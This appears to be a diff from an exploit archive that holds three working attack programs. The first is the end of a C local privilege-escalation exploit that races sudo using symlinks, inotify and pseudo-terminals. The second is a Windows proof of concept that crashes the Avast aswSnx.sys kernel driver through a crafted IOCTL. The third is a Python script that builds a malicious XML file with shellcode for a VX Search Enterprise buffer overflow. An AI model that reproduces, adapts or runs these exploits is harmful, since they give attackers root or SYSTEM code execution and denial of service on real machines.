if (symlink(TARGET_FILE, TTY_SYMLINK_)) die();
if (symlink(SUDO_BINARY, comm)) die();
const int inotify_fd = inotify_init1(IN_CLOEXEC);
if (inotify_fd <= -1) die();
const int working_wd = inotify_add_watch(inotify_fd, WORKING_DIR, IN_OPEN | IN_CLOSE_NOWRITE);
if (working_wd <= -1) die();
const int cpu = sched_getcpu();
if (cpu >= CPU_SETSIZE) die();
if (cpu < 0) die();
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(cpu, &cpu_set);
if (sched_setaffinity(0, sizeof(cpu_set), &cpu_set) != 0) die();
const pid_t pid = fork();
if (pid <= -1) die();
if (pid == 0) {
const unsigned int argc = 3 + my_argc - 1;
char ** const argv = calloc(argc + 1, sizeof(char *));
if (!argv) die();
argv[0] = comm;
argv[1] = "-r";
argv[2] = SELINUX_ROLE;
memcpy(&argv[3], &my_argv[1], my_argc * sizeof(char *));
if (argv[argc]) die();
if (setpriority(PRIO_PROCESS, 0, +19) != 0) die();
static const struct sched_param sched_param = { .sched_priority = 0 };
(void) sched_setscheduler(0, SCHED_IDLE, &sched_param);
execve(*argv, argv, NULL);
die();
}
struct inotify_event event;
if (read(inotify_fd, &event, sizeof(event)) != (ssize_t)sizeof(event)) die();
if (kill(pid, SIGSTOP)) die();
if (event.wd != working_wd) die();
if (event.mask != (IN_OPEN | IN_ISDIR)) die();
for (i = 0; ; i++) {
if (i >= sizeof(pts_fds) / sizeof(*pts_fds)) die();
int ptm_fd;
char tmp[PATH_MAX];
if (openpty(&ptm_fd, &pts_fds[i], tmp, NULL, NULL)) die();
if (!strcmp(tmp, pts)) break;
if (close(ptm_fd)) die();
}
while (i--) {
if (close(pts_fds[i])) die();
}
if (kill(pid, SIGCONT)) die();
if (read(inotify_fd, &event, sizeof(event)) != (ssize_t)sizeof(event)) die();
if (kill(pid, SIGSTOP)) die();
if (event.wd != working_wd) die();
if (event.mask != (IN_CLOSE_NOWRITE | IN_ISDIR)) die();
if (rename(TTY_SYMLINK_, TTY_SYMLINK)) die();
if (kill(pid, SIGCONT)) die();
int status = 0;
if (waitpid(pid, &status, WUNTRACED) != pid) die();
if (!WIFEXITED(status)) die();
if (unlink(comm)) die();
if (unlink(TTY_SYMLINK)) die();
if (rmdir(WORKING_DIR)) die();
exit(WEXITSTATUS(status));
}

45
platforms/windows/dos/42182.cpp Executable file
View file

@ -0,0 +1,45 @@
/**
* Author: bee13oy
* BSoD on Windows 7 x86 / Windows 10 x86 + Avast Premier / Avast Free Antivirus (11.1.2253)
* Source: https://github.com/bee13oy/AV_Kernel_Vulns/tree/master/Avast/aswSnx_BSoD2(ZDI-16-681)
*
* There is a Memory Corruption Vulnerability in aswSnx.sys when DeviceIoControl API is called with ioctl
* number 0x82ac0170, and An attacker may leverage this vulnerability to execute arbitrary code in the
* context of SYSTEM.
**/
#include <Windows.h>
void BSoD(const char* szDeviceName)
{
HANDLE hDevice = CreateFileA(szDeviceName,
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
0,
NULL);
if (hDevice != INVALID_HANDLE_VALUE)
{
DWORD nbBytes = 0;
CHAR bufInput[0x8+1] = "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a";
CHAR bufOuput[0x8+1] = "";
DeviceIoControl(hDevice,
0x82ac0170,
bufInput,
0x00000008,
bufOuput,
0x00000008,
&nbBytes,
NULL
);
}
}
int _tmain(int argc, _TCHAR* argv[])
{
BSoD("\\\\.\\aswSnx");
return 0;
}

48
platforms/windows/local/42181.py Executable file
View file

@ -0,0 +1,48 @@
import os
import struct
author = '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: VX Search Enterprise v9.7.18 Import Local Buffer Overflow Vuln.
# Date: 2017.06.15
# Exploit Author: Greg Priest
# Version: VX Search Enterprise v9.7.18
# Tested on: Windows7 x64 HUN/ENG Professional
'''
overflow = "A" * 1536
jmp_esp = "\x4E\x21\x1F\x65"
#"\x94\x21\x1C\x65"
shortjump = "\xEB\x55"
shellcode3= ("\xbe\x7a\x1f\x2d\x97\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x30\x83\xc2\x04\x31\x72\x0f\x03\x72\x75\xfd\xd8\x6b\x61\x83"
"\x23\x94\x71\xe4\xaa\x71\x40\x24\xc8\xf2\xf2\x94\x9a\x57\xfe"
"\x5f\xce\x43\x75\x2d\xc7\x64\x3e\x98\x31\x4a\xbf\xb1\x02\xcd"
"\x43\xc8\x56\x2d\x7a\x03\xab\x2c\xbb\x7e\x46\x7c\x14\xf4\xf5"
"\x91\x11\x40\xc6\x1a\x69\x44\x4e\xfe\x39\x67\x7f\x51\x32\x3e"
"\x5f\x53\x97\x4a\xd6\x4b\xf4\x77\xa0\xe0\xce\x0c\x33\x21\x1f"
"\xec\x98\x0c\x90\x1f\xe0\x49\x16\xc0\x97\xa3\x65\x7d\xa0\x77"
"\x14\x59\x25\x6c\xbe\x2a\x9d\x48\x3f\xfe\x78\x1a\x33\x4b\x0e"
"\x44\x57\x4a\xc3\xfe\x63\xc7\xe2\xd0\xe2\x93\xc0\xf4\xaf\x40"
"\x68\xac\x15\x26\x95\xae\xf6\x97\x33\xa4\x1a\xc3\x49\xe7\x70"
"\x12\xdf\x9d\x36\x14\xdf\x9d\x66\x7d\xee\x16\xe9\xfa\xef\xfc"
"\x4e\xf4\xa5\x5d\xe6\x9d\x63\x34\xbb\xc3\x93\xe2\xff\xfd\x17"
"\x07\x7f\xfa\x08\x62\x7a\x46\x8f\x9e\xf6\xd7\x7a\xa1\xa5\xd8"
"\xae\xc2\x28\x4b\x32\x05")
crash = overflow+jmp_esp+"\x90"*24+shortjump+"\x90"*76+"\x90" * 58+shellcode3
evil = '<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + crash + '\n</classify>'
exploit = open('Magic.xml', 'w')
exploit.write(evil)
exploit.close()
print "Magic.xml raedy!"